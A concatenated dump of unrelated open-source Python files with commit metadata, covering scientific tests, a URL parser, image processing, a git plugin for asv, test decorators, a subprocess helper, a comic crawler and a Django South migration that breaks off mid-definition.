    """Inverse of date_to_dark_id: YYYYDOY -> 'YYYY:DOY'."""
    assert dark_cal.dark_id_to_date('2011015') == '2011:015'
def test_dark_temp_scale():
    """Regression value for scaling dark current from -10 C to -14 C."""
    scale = dark_cal.dark_temp_scale(-10., -14)
    assert np.allclose(scale, 0.70)
def test_get_dark_cal_id():
    """'nearest'/'before'/'after' selection around the 2007006 / 2007069 cals."""
    assert dark_cal.get_dark_cal_id('2007:008', 'nearest') == '2007006'
    assert dark_cal.get_dark_cal_id('2007:008', 'before') == '2007006'
    assert dark_cal.get_dark_cal_id('2007:008', 'after') == '2007069'
def test_get_dark_cal_image():
    """Dark cal images are full-frame 1024x1024."""
    image = dark_cal.get_dark_cal_image('2007:008')
    assert image.shape == (1024, 1024)
def test_get_dark_cal_props():
    """Props include replicas and start time; include_image adds the image."""
    props = dark_cal.get_dark_cal_props('2007:008')
    assert len(props['replicas']) == 5
    assert props['start'] == '2007:006:01:56:46.817'

    props = dark_cal.get_dark_cal_props('2007:008', include_image=True)
    assert len(props['replicas']) == 5
    assert props['start'] == '2007:006:01:56:46.817'
    assert props['image'].shape == (1024, 1024)
def test_get_dark_cal_props_table():
    """Regression values for the 'eb' column over calendar year 2007."""
    props = dark_cal.get_dark_cal_props_table('2007:001', '2008:001')
    assert np.allclose(props['eb'], [24.6, 25.89, 51.13, 1.9])
| Python | 0 | |
dd3ed1c8fdf9024a7978a1443baf8ca101f21642 | add demo object for channel | server/Mars/MarsRpc/ChannelObjs.py | server/Mars/MarsRpc/ChannelObjs.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2016 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from MarsLog.LogManager import LogManager
from Utils.Const import *
class EchoChannelObj(object):
    """Demo channel object: logs incoming data and echoes it back on the
    same connector."""

    def __init__(self, connector):
        super(EchoChannelObj, self).__init__()
        self.logger = LogManager.getLogger('MarsRpc.EchoChannelObj')
        self.connector = connector

    def onDisconnected(self):
        """Called when the underlying connector is closed."""
        self.logger.info('connector closed')

    def onRead(self, data):
        """Echo *data* back to the peer and report success."""
        self.logger.info('received data: %s', data)
        self.connector.writeData(data)
        return MARS_RC_SUCCESSED
class LoggingChannelObj(object):
    """Demo channel object that only logs whatever it receives."""

    def __init__(self, connector):
        super(LoggingChannelObj, self).__init__()
        # BUG FIX: was assigned to `self.loggero`, so onDisconnected/onRead
        # crashed with AttributeError on `self.logger`.
        self.logger = LogManager.getLogger('MarsRpc.LoggingChannelObj')
        self.connector = connector

    def onDisconnected(self):
        """Called when the underlying connector is closed."""
        self.logger.info('connector closed')

    def onRead(self, data):
        """Log the received data and report success."""
        self.logger.info('received data: %s', data)
        return MARS_RC_SUCCESSED
| Python | 0.000001 | |
160a3012db5513b4d3a45098a9b0b72e1f117b20 | add a constant coefficient test for sanity | lowmach/mg_constant_test.py | lowmach/mg_constant_test.py | #!/usr/bin/env python
"""
Test the variable coefficient MG solver with a CONSTANT coefficient
problem -- the same on from the multigrid class test. This ensures
we didn't screw up the base functionality here.
We solve:
u_xx + u_yy = -2[(1-6x**2)y**2(1-y**2) + (1-6y**2)x**2(1-x**2)]
u = 0 on the boundary
this is the example from page 64 of the book `A Multigrid Tutorial, 2nd Ed.'
The analytic solution is u(x,y) = (x**2 - x**4)(y**4 - y**2)
"""
from __future__ import print_function
import sys
import numpy
import mesh.patch as patch
import variable_coeff_MG as MG
import pylab
# the analytic solution
def true(x, y):
    """Analytic solution u(x, y) = (x**2 - x**4)*(y**4 - y**2)."""
    u_x = x**2 - x**4
    u_y = y**4 - y**2
    return u_x*u_y
# the coefficients
def alpha(x, y):
    """Constant coefficient field: an array of ones shaped/typed like x
    (y is accepted for signature compatibility but unused)."""
    return numpy.full_like(x, 1)
# the L2 error norm
def error(myg, r):
    """L2 norm of the interior elements of r, scaled by the cell area
    dx*dy to normalize."""
    interior = r[myg.ilo:myg.ihi+1, myg.jlo:myg.jhi+1]
    sum_sq = numpy.sum((interior**2).flat)
    return numpy.sqrt(myg.dx*myg.dy*sum_sq)
# the righthand side
def f(x, y):
    """Righthand side of the Poisson problem (A Multigrid Tutorial, p. 64):
    -2[(1-6x^2)y^2(1-y^2) + (1-6y^2)x^2(1-x^2)]."""
    term_x = (1.0-6.0*x**2)*y**2*(1.0-y**2)
    term_y = (1.0-6.0*y**2)*x**2*(1.0-x**2)
    return -2.0*(term_x + term_y)
# test the multigrid solver
# Grid size for the convergence check.
nx = 256
ny = nx

# create the coefficient variable -- note we don't want Dirichlet here,
# because that will try to make alpha = 0 on the interface. alpha can
# have different BCs than phi
g = patch.Grid2d(nx, ny, ng=1)
d = patch.CellCenterData2d(g)
bc_c = patch.BCObject(xlb="neumann", xrb="neumann",
                      ylb="neumann", yrb="neumann")
d.register_var("c", bc_c)
d.create()

# Fill the (constant) coefficient field and plot it for inspection.
c = d.get_var("c")
c[:,:] = alpha(g.x2d, g.y2d)

pylab.clf()
pylab.figure(num=1, figsize=(5.0,5.0), dpi=100, facecolor='w')
pylab.imshow(numpy.transpose(c[g.ilo:g.ihi+1,g.jlo:g.jhi+1]),
             interpolation="nearest", origin="lower",
             extent=[g.xmin, g.xmax, g.ymin, g.ymax])
pylab.xlabel("x")
pylab.ylabel("y")
pylab.title("nx = {}".format(nx))
pylab.colorbar()
pylab.savefig("mg_alpha.png")

# check whether the RHS sums to zero (necessary for periodic data)
rhs = f(g.x2d, g.y2d)
print("rhs sum: {}".format(numpy.sum(rhs[g.ilo:g.ihi+1,g.jlo:g.jhi+1])))

# create the multigrid object
a = MG.VarCoeffCCMG2d(nx, ny,
                      xl_BC_type="dirichlet", yl_BC_type="dirichlet",
                      xr_BC_type="dirichlet", yr_BC_type="dirichlet",
                      nsmooth=10,
                      nsmooth_bottom=50,
                      coeffs=c, coeffs_bc=bc_c,
                      verbose=1)

# debugging
# for i in range(a.nlevels):
#     print(i)
#     print(a.grids[i].get_var("coeffs"))

# initialize the solution to 0
a.init_zeros()

# initialize the RHS using the function f
rhs = f(a.x2d, a.y2d)
a.init_RHS(rhs)

# solve to a relative tolerance of 1.e-11
a.solve(rtol=1.e-11)
#a.smooth(a.nlevels-1, 50000)

# alternately, we can just use smoothing by uncommenting the following
#a.smooth(a.nlevels-1,50000)

# get the solution
v = a.get_solution()

# compute the error from the analytic solution
b = true(a.x2d,a.y2d)
e = v - b

print(" L2 error from true solution = %g\n rel. err from previous cycle = %g\n num. cycles = %d" % \
      (error(a.soln_grid, e), a.relative_error, a.num_cycles))

# plot it: solution on the left, pointwise error on the right
pylab.clf()
pylab.figure(num=1, figsize=(10.0,5.0), dpi=100, facecolor='w')

pylab.subplot(121)
pylab.imshow(numpy.transpose(v[a.ilo:a.ihi+1,a.jlo:a.jhi+1]),
             interpolation="nearest", origin="lower",
             extent=[a.xmin, a.xmax, a.ymin, a.ymax])
pylab.xlabel("x")
pylab.ylabel("y")
pylab.title("nx = {}".format(nx))
pylab.colorbar()

pylab.subplot(122)
pylab.imshow(numpy.transpose(e[a.ilo:a.ihi+1,a.jlo:a.jhi+1]),
             interpolation="nearest", origin="lower",
             extent=[a.xmin, a.xmax, a.ymin, a.ymax])
pylab.xlabel("x")
pylab.ylabel("y")
pylab.title("error")
pylab.colorbar()

pylab.tight_layout()
pylab.savefig("mg_test.png")

# store the output for later comparison
my_data = a.get_solution_object()
my_data.write("mg_test")
| Python | 0.000049 | |
81b9d141295ee2a8b31974aa86d89b80dfefe3ca | Create question5.py | chengjun/question5.py | chengjun/question5.py | #!usr/bin/python
import re
class extrac_url():
    """Crude regex-based URL splitter for URLs shaped like
    scheme://netloc/path?query#fragment.

    NOTE: the regexes are greedy, so a path containing extra '/' or '?'
    characters shifts the netloc/path boundaries accordingly.
    """

    def __init__(self, url):
        self.url = url

    def pater(self):
        """Return [scheme, netloc, path, query_params, fragment]."""
        full = self.url
        # Exactly one '//' is required for this two-way unpacking.
        unused_scheme, rest = full.split('//')
        scheme = re.search(r'(.+)//', full).group(1)
        netloc = re.search(r'//(.+)/', full).group(1)
        path = re.search(r'(/.+)\?', rest).group(1)
        raw_query = re.search(r'\?(.+)#', full).group(1)
        # Split on '&' and break each pair at its first '='.
        params = {}
        for pair in re.split(r'&', raw_query):
            eq = pair.find('=')
            params[pair[:eq]] = pair[eq + 1:]
        fragment = re.search(r'#(.+)', full).group(1)
        return [scheme, netloc, path, params, fragment]
if __name__=="__main__":
ttt = extrac_url("http://mp.weixin.qq.com/s?__biz=MzA4MjEyNTA5Mw==&mid=2652566513#wechat_redirect").pater()
print "scheme is %s " % ttt[0]
print "netloc is %s " % ttt[1]
print 'path is %s'%ttt[2]
print 'query_params is %s'%ttt[3]
print 'fragment is %s'%ttt[4]
#rint ttt
| Python | 0.99937 | |
5eefc407b8f51c017a3f4193c88f6dc188a88601 | Include OpenCV based Python CLAHE script | src/CLAHE_dir.py | src/CLAHE_dir.py | from PIL import Image
import numpy as np
import h5py
import os
import sys
import cv2
# Maybe consider implemeting more involved auto-balancing
# http://wiki.cmci.info/documents/120206pyip_cooking/python_imagej_cookbook#automatic_brightnesscontrast_button
def apply_clahe_to_H5(fn, clahe):
    """Apply the given OpenCV CLAHE operator to the /img dataset of an
    HDF5 file in place, then stretch the result to the full 0-255 range."""
    f = h5py.File(fn, "r+")
    img = f["/img"]
    # apply clahe
    arr = clahe.apply(np.array(img))
    # stretch distribution across 0-255 range
    # NOTE(review): divides by (max - min); a perfectly flat image would
    # raise ZeroDivisionError -- confirm inputs always have contrast.
    max_a = np.max(arr)
    min_a = np.min(arr)
    alpha = 255.0/(max_a - min_a)
    beta = -alpha*min_a
    arr = (alpha*arr + beta).astype(np.uint8)
    # resave image
    img[...] = arr
    f.close()
def get_H5_array(fn):
f = h5py.File(fn, "r")
return np.array(f["/img"])
def main():
    """Make TIF images of all H5 matrices in directory
    """
    dir = os.getcwd()
    # file = sys.argv[1]
    files = os.listdir(dir)
    # Large tile grid so equalization is nearly global per tile.
    clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(63,63))
    for file in files:
        # Only prealigned section-1,1 tiles are processed, in place.
        if file.endswith("1,1_prealigned.h5"):
            print "Applying CLAHE to " + file
            # if file == 'Tile_r1-c7_S2-W001_sec15.h5':
            fn = os.path.join(dir, file)
            apply_clahe_to_H5(fn, clahe)
# if __name__ == '__main__':
# main() | Python | 0 | |
5fbd3d187c0a1c164c34320ad504030206429c19 | Use --first-parent when collecting commits. | asv/plugins/git.py | asv/plugins/git.py | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Supports git repositories for the benchmarked project.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import re
from ..console import log
from ..repo import Repo
from .. import util
class Git(Repo):
    """asv Repo backend for git repositories (clones, checks out revisions
    and extracts commit metadata by shelling out to the git binary)."""

    def __init__(self, url, path):
        self._git = util.which("git")
        self._path = os.path.abspath(path)

        # First use: clone the project; afterwards just fetch updates.
        if not os.path.exists(self._path):
            log.info("Cloning project")
            self._run_git(['clone', url, self._path], chdir=False)
        log.info("Fetching recent changes")
        self.pull()

    @property
    def path(self):
        # Local working-copy directory.
        return self._path

    @classmethod
    def url_match(cls, url):
        """Return True if *url* looks like a git clone URL (https or ssh)."""
        regexes = [
            '^https?://.*?\.git$',
            '^git@.*?\.git$']

        for regex in regexes:
            if re.match(regex, url):
                return True
        return False

    def _run_git(self, args, chdir=True, **kwargs):
        """Run git with *args*, optionally from inside the working copy;
        the original cwd is always restored."""
        if chdir:
            orig_dir = os.getcwd()
            os.chdir(self._path)
        try:
            return util.check_output(
                [self._git] + args, **kwargs)
        finally:
            if chdir:
                os.chdir(orig_dir)

    def pull(self):
        """Fetch from origin and fast-forward the local master branch."""
        self._run_git(['fetch', 'origin'])
        self.checkout('master')
        self._run_git(['pull'])

    def checkout(self, branch='master'):
        """Check out *branch* and remove any untracked build artifacts."""
        self._run_git(['checkout', branch])
        self.clean()

    def clean(self):
        # -fxd: force-remove untracked and ignored files and directories.
        self._run_git(['clean', '-fxd'])

    def get_date(self, hash):
        """Return the commit time of *hash* in milliseconds since epoch."""
        # TODO: This works on Linux, but should be extended for other platforms
        return int(self._run_git(
            ['show', hash, '--quiet', '--format=format:%ct'],
            dots=False).strip().split()[0]) * 1000

    def get_hashes_from_range(self, range_spec):
        """Return commit hashes in *range_spec*, following only the first
        parent of merges (so merged-branch interior commits are skipped)."""
        if range_spec == 'master':
            range_spec = 'master^!'
        return self._run_git(
            ['log', '--quiet', '--first-parent', '--format=format:%H',
             range_spec], dots=False
        ).strip().split()

    def get_hash_from_tag(self, tag):
        """Resolve *tag* to its commit hash."""
        return self._run_git(
            ['show', tag, '--quiet', '--format=format:%H'],
            dots=False).strip().split()[0]

    def get_tags(self):
        """Return the list of all tag names."""
        return self._run_git(
            ['tag', '-l']).strip().split()

    def get_date_from_tag(self, tag):
        """Return the tagged commit's time in milliseconds since epoch."""
        return self.get_date(tag + "^{commit}")
| # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Supports git repositories for the benchmarked project.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import re
from ..console import log
from ..repo import Repo
from .. import util
class Git(Repo):
    """asv Repo backend for git repositories (pre-change copy: commit
    collection does not yet use --first-parent)."""

    def __init__(self, url, path):
        self._git = util.which("git")
        self._path = os.path.abspath(path)

        # First use: clone the project; afterwards just fetch updates.
        if not os.path.exists(self._path):
            log.info("Cloning project")
            self._run_git(['clone', url, self._path], chdir=False)
        log.info("Fetching recent changes")
        self.pull()

    @property
    def path(self):
        # Local working-copy directory.
        return self._path

    @classmethod
    def url_match(cls, url):
        """Return True if *url* looks like a git clone URL (https or ssh)."""
        regexes = [
            '^https?://.*?\.git$',
            '^git@.*?\.git$']

        for regex in regexes:
            if re.match(regex, url):
                return True
        return False

    def _run_git(self, args, chdir=True, **kwargs):
        """Run git with *args*, optionally from inside the working copy;
        the original cwd is always restored."""
        if chdir:
            orig_dir = os.getcwd()
            os.chdir(self._path)
        try:
            return util.check_output(
                [self._git] + args, **kwargs)
        finally:
            if chdir:
                os.chdir(orig_dir)

    def pull(self):
        """Fetch from origin and fast-forward the local master branch."""
        self._run_git(['fetch', 'origin'])
        self.checkout('master')
        self._run_git(['pull'])

    def checkout(self, branch='master'):
        """Check out *branch* and remove any untracked build artifacts."""
        self._run_git(['checkout', branch])
        self.clean()

    def clean(self):
        # -fxd: force-remove untracked and ignored files and directories.
        self._run_git(['clean', '-fxd'])

    def get_date(self, hash):
        """Return the commit time of *hash* in milliseconds since epoch."""
        # TODO: This works on Linux, but should be extended for other platforms
        return int(self._run_git(
            ['show', hash, '--quiet', '--format=format:%ct'],
            dots=False).strip().split()[0]) * 1000

    def get_hashes_from_range(self, range_spec):
        """Return all commit hashes reachable in *range_spec*."""
        if range_spec == 'master':
            range_spec = 'master^!'
        return self._run_git(
            ['log', '--quiet', '--format=format:%H', range_spec], dots=False
        ).strip().split()

    def get_hash_from_tag(self, tag):
        """Resolve *tag* to its commit hash."""
        return self._run_git(
            ['show', tag, '--quiet', '--format=format:%H'],
            dots=False).strip().split()[0]

    def get_tags(self):
        """Return the list of all tag names."""
        return self._run_git(
            ['tag', '-l']).strip().split()

    def get_date_from_tag(self, tag):
        """Return the tagged commit's time in milliseconds since epoch."""
        return self.get_date(tag + "^{commit}")
| Python | 0 |
d4d9d9ac478bdaf2385ecff0a43bfc8fe4bb11c7 | Add decorator for ignoring DeprecationWarnings | oscar/test/decorators.py | oscar/test/decorators.py | import warnings
from functools import wraps
import mock
def dataProvider(fn_data_provider):
"""
Data provider decorator, allows another callable to provide the data for
the test. This is a nice feature from PHPUnit which is very useful. Am
sticking with the JUnit style naming as unittest does this already.
Implementation based on:
http://melp.nl/2011/02/phpunit-style-dataprovider-in-python-unit-test/#more-525
"""
def test_decorator(test_method):
def execute_test_method_with_each_data_set(self):
for data in fn_data_provider():
if (len(data) == 2 and isinstance(data[0], tuple) and
isinstance(data[1], dict)):
# Both args and kwargs being provided
args, kwargs = data[:]
else:
args, kwargs = data, {}
try:
test_method(self, *args, **kwargs)
except AssertionError, e:
self.fail("%s (Provided data: %s, %s)" % (e, args, kwargs))
return execute_test_method_with_each_data_set
return test_decorator
# This will be in Oscar 0.6 - it should be functools though!
def compose(*functions):
"""
Compose functions
This is useful for combining decorators.
"""
def _composed(*args):
for fn in functions:
try:
args = fn(*args)
except TypeError:
# args must be scalar so we don't try to expand it
args = fn(args)
return args
return _composed
# Reusable mock.patch decorators that make a test fail fast if it touches
# an external resource (database, filesystem or network).
no_database = mock.patch(
    'django.db.backends.util.CursorWrapper', mock.Mock(
        side_effect=RuntimeError("Using the database is not permitted!")))
no_filesystem = mock.patch('__builtin__.open', mock.Mock(
    side_effect=RuntimeError("Using the filesystem is not permitted!")))
no_sockets = mock.patch('socket.getaddrinfo', mock.Mock(
    side_effect=RuntimeError("Using sockets is not permitted!")))
# Combined decorator forbidding all three kinds of external access.
no_externals = no_diggity = compose(
    no_database, no_filesystem, no_sockets)  # = no doubt
def ignore_deprecation_warnings(target):
    """
    Ignore deprecation warnings for the wrapped TestCase or test method

    This is useful as the test runner can be set to raise an exception on a
    deprecation warning. Using this decorator allows tests to exercise
    deprecated code without an exception.
    """
    if not target.__class__.__name__ == 'instancemethod':
        # Decorate every test method in class
        # NOTE(review): 'instancemethod' is the Python 2 type name for
        # methods accessed on a class; on Python 3 this branch would also be
        # taken for plain functions -- confirm before any Py3 migration.
        for attr in dir(target):
            if not attr.startswith('test'):
                continue
            attr_value = getattr(target, attr)
            if not hasattr(attr_value, '__call__'):
                continue
            # Recurse: each test method takes the single-method branch below.
            setattr(target, attr, ignore_deprecation_warnings(attr_value))
        return target
    else:
        # Decorate single test method
        @wraps(target)
        def _wrapped(*args, **kwargs):
            # Suppress DeprecationWarning only for the duration of the call;
            # catch_warnings() restores the previous filters afterwards.
            with warnings.catch_warnings():
                warnings.filterwarnings("ignore", category=DeprecationWarning)
                return target(*args, **kwargs)
        return _wrapped
| import mock
def dataProvider(fn_data_provider):
    """
    Data provider decorator, allows another callable to provide the data for
    the test. This is a nice feature from PHPUnit which is very useful. Am
    sticking with the JUnit style naming as unittest does this already.

    Implementation based on:
    http://melp.nl/2011/02/phpunit-style-dataprovider-in-python-unit-test/#more-525
    """
    def test_decorator(test_method):
        def execute_test_method_with_each_data_set(self):
            for data in fn_data_provider():
                if (len(data) == 2 and isinstance(data[0], tuple) and
                        isinstance(data[1], dict)):
                    # Both args and kwargs being provided
                    args, kwargs = data[:]
                else:
                    args, kwargs = data, {}
                try:
                    test_method(self, *args, **kwargs)
                except AssertionError as e:
                    # Fixed: "except X as e" works on Python 2.6+ AND
                    # Python 3; the old "except X, e" comma form is a
                    # SyntaxError on Python 3.
                    self.fail("%s (Provided data: %s, %s)" % (e, args, kwargs))
        return execute_test_method_with_each_data_set
    return test_decorator
# This will be in Oscar 0.6 - it should be functools though!
def compose(*functions):
    """
    Compose functions, applying them left to right.

    This is useful for combining decorators.
    """
    def _composed(*args):
        result = args
        for fn in functions:
            try:
                result = fn(*result)
            except TypeError:
                # result must be scalar so we don't try to expand it
                result = fn(result)
        return result
    return _composed
# Reusable mock.patch decorators that make a test fail fast if it touches
# an external resource (database, filesystem or network).
no_database = mock.patch(
    'django.db.backends.util.CursorWrapper', mock.Mock(
        side_effect=RuntimeError("Using the database is not permitted!")))
no_filesystem = mock.patch('__builtin__.open', mock.Mock(
    side_effect=RuntimeError("Using the filesystem is not permitted!")))
no_sockets = mock.patch('socket.getaddrinfo', mock.Mock(
    side_effect=RuntimeError("Using sockets is not permitted!")))
# Combined decorator forbidding all three kinds of external access.
no_externals = no_diggity = compose(
    no_database, no_filesystem, no_sockets)  # = no doubt
| Python | 0 |
f0af14b8fcd420b63a47e18938664e14cf9ea968 | Add generic asynchronous/synchronous run command | subiquity/utils.py | subiquity/utils.py | # Copyright 2015 Canonical, Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import errno
import subprocess
import os
import codecs
import pty
from tornado.process import Subprocess
from subiquity.async import Async
import shlex
import logging
log = logging.getLogger("subiquity.utils")
STREAM = Subprocess.STREAM
def run_command_async(cmd, streaming_callback=None):
    """Submit run_command(cmd, streaming_callback) to the Async worker pool.

    Returns whatever Async.pool.submit() returns -- presumably a
    futures-style handle for the eventual run_command() result (TODO:
    confirm against subiquity.async).
    """
    return Async.pool.submit(run_command, cmd, streaming_callback)
def run_command(cmd, streaming_callback=None):
    """ Executes `cmd` sending its output to `streaming_callback`

    The child's stdout is attached to a pseudo-terminal so programs that
    only emit progress output on a tty keep doing so; stderr stays a
    regular pipe so errors can be reported separately.

    :param cmd: command to run; a string (split with shlex) or an argv list.
    :param streaming_callback: optional callable invoked with roughly the
        last ten lines of decoded output whenever new output arrives.
    :returns: the command's complete stdout, stripped.
    :raises Exception: if the command exits non-zero.
    """
    if isinstance(cmd, str):
        cmd = shlex.split(cmd)
    log.debug("Running command: {}".format(cmd))
    stdoutm, stdouts = pty.openpty()
    proc = subprocess.Popen(cmd,
                            stdout=stdouts,
                            stderr=subprocess.PIPE)
    # The child now owns the slave end; close our copy so EOF can be seen.
    os.close(stdouts)
    # Incremental decoder: a 512-byte read may split a multi-byte sequence.
    decoder = codecs.getincrementaldecoder('utf-8')()

    def last_ten_lines(s):
        # Only examine the tail of the output to keep this cheap.
        chunk = s[-1500:]
        lines = chunk.splitlines(True)
        return ''.join(lines[-10:]).replace('\r', '')

    decoded_output = ""
    try:
        while proc.poll() is None:
            try:
                b = os.read(stdoutm, 512)
            except OSError as e:
                # On Linux, reading the pty master after the child closed
                # the slave raises EIO; treat that as end-of-stream.
                if e.errno != errno.EIO:
                    raise
                break
            else:
                final = False
                if not b:
                    final = True
                decoded_chars = decoder.decode(b, final)
                if decoded_chars is None:
                    continue
                decoded_output += decoded_chars
                if streaming_callback:
                    ls = last_ten_lines(decoded_output)
                    streaming_callback(ls)
                if final:
                    break
    finally:
        os.close(stdoutm)
        if proc.poll() is None:
            proc.kill()
        proc.wait()
    errors = [l.decode('utf-8') for l in proc.stderr.readlines()]
    # Fixed: close the stderr pipe explicitly instead of leaking the file
    # descriptor until garbage collection.
    proc.stderr.close()
    if streaming_callback:
        streaming_callback(last_ten_lines(decoded_output))
    errors = ''.join(errors)
    if proc.returncode == 0:
        return decoded_output.strip()
    else:
        log.debug("Error with command: "
                  "[Output] '{}' [Error] '{}'".format(
                      decoded_output.strip(),
                      errors.strip()))
        raise Exception("Problem running command: [Error] '{}'".format(
            errors.strip()))
| Python | 0 | |
2aab90ab9e4a32bef1496149a2780b7385318043 | Add tests | symengine/tests/test_cse.py | symengine/tests/test_cse.py | from symengine import cse, sqrt, symbols
def test_cse_single():
    """cse() on one expression factors out the shared (x + y) subterm."""
    x, y, x0 = symbols("x, y, x0")
    e = pow(x + y, 2) + sqrt(x + y)
    substs, reduced = cse([e])
    assert substs == [(x0, x + y)]
    assert reduced == [sqrt(x0) + x0**2]
def test_multiple_expressions():
    """cse() factors a subterm shared across several input expressions."""
    w, x, y, z, x0 = symbols("w, x, y, z, x0")
    e1 = (x + y)*z
    e2 = (x + y)*w
    substs, reduced = cse([e1, e2])
    assert substs == [(x0, x + y)]
    assert reduced == [x0*z, x0*w]
| Python | 0.000001 | |
5a21b66f7ab77f419245d8c07d7473a6e1600fc4 | Add crawler for 'Hark, A Vagrant' | comics/crawler/crawlers/harkavagrant.py | comics/crawler/crawlers/harkavagrant.py | from comics.crawler.base import BaseComicCrawler
from comics.crawler.meta import BaseComicMeta
class ComicMeta(BaseComicMeta):
    # Static metadata describing the 'Hark, A Vagrant!' comic.
    name = 'Hark, A Vagrant!'
    language = 'en'
    url = 'http://www.harkavagrant.com/'
    start_date = '2008-05-01'  # date of the first strip (YYYY-MM-DD)
    history_capable_days = 120  # how far back crawling is supported
    schedule = 'Mo,Tu,We,Th,Fr,Sa,Su'  # published every day of the week
    time_zone = -8  # presumably the publisher's UTC offset in hours -- confirm
    rights = 'Kate Beaton'  # copyright holder
class ComicCrawler(BaseComicCrawler):
    def _get_url(self):
        """Locate today's strip image URL and title in the comic's RSS feed."""
        self.parse_feed('http://www.rsspect.com/rss/vagrant.xml')
        for entry in self.feed.entries:
            if self.timestamp_to_date(entry.updated_parsed) != self.pub_date:
                continue
            fragments = entry.summary.split('"')
            for index, fragment in enumerate(fragments):
                if 'src=' in fragment:
                    self.url = fragments[index + 1]
                if 'title=' in fragment:
                    self.title = fragments[index + 1]
                if self.url and self.title:
                    return
| Python | 0.000002 | |
2f188d3d43741821126e381af9753e0e3d7be231 | test hello python file | t/library/hello.py | t/library/hello.py | import ngx
# Write a greeting to the response via the embedded ngx_python API.
ngx.echo("Hello, Ngx_python\n")
c2a0b66ec1ad7f32e1291fc6a2312d2a4a06a6e3 | Add class-file to right location | src/mmhandler.py | src/mmhandler.py | class MmHandler:
pass
| Python | 0.000001 | |
aa096865f425a57ccbde51d0586be8a07403a6bd | Add migration for BoundarySet start/end see #25 | boundaries/south_migrations/0005_add_set_start_end_date.py | boundaries/south_migrations/0005_add_set_start_end_date.py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: add nullable start_date/end_date columns to
    BoundarySet."""

    def forwards(self, orm):
        """Apply the migration: add the two nullable DateField columns."""
        # Adding field 'BoundarySet.start_date'
        db.add_column(u'boundaries_boundaryset', 'start_date',
                      self.gf('django.db.models.fields.DateField')(null=True, blank=True),
                      keep_default=False)

        # Adding field 'BoundarySet.end_date'
        db.add_column(u'boundaries_boundaryset', 'end_date',
                      self.gf('django.db.models.fields.DateField')(null=True, blank=True),
                      keep_default=False)

    def backwards(self, orm):
        """Revert the migration: drop both columns again."""
        # Deleting field 'BoundarySet.start_date'
        db.delete_column(u'boundaries_boundaryset', 'start_date')

        # Deleting field 'BoundarySet.end_date'
        db.delete_column(u'boundaries_boundaryset', 'end_date')

    # Frozen ORM snapshot generated by South; do not edit by hand.
    models = {
        u'boundaries.boundary': {
            'Meta': {'unique_together': "((u'slug', u'set'),)", 'object_name': 'Boundary'},
            'centroid': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'}),
            'extent': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
            'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'label_point': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True', 'spatial_index': 'False', 'blank': 'True'}),
            'metadata': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '192', 'db_index': 'True'}),
            'set': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'boundaries'", 'to': u"orm['boundaries.BoundarySet']"}),
            'set_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'shape': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {}),
            'simple_shape': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'})
        },
        u'boundaries.boundaryset': {
            'Meta': {'ordering': "(u'name',)", 'object_name': 'BoundarySet'},
            'authority': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'extent': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
            'extra': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
            'last_updated': ('django.db.models.fields.DateField', [], {}),
            'licence_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
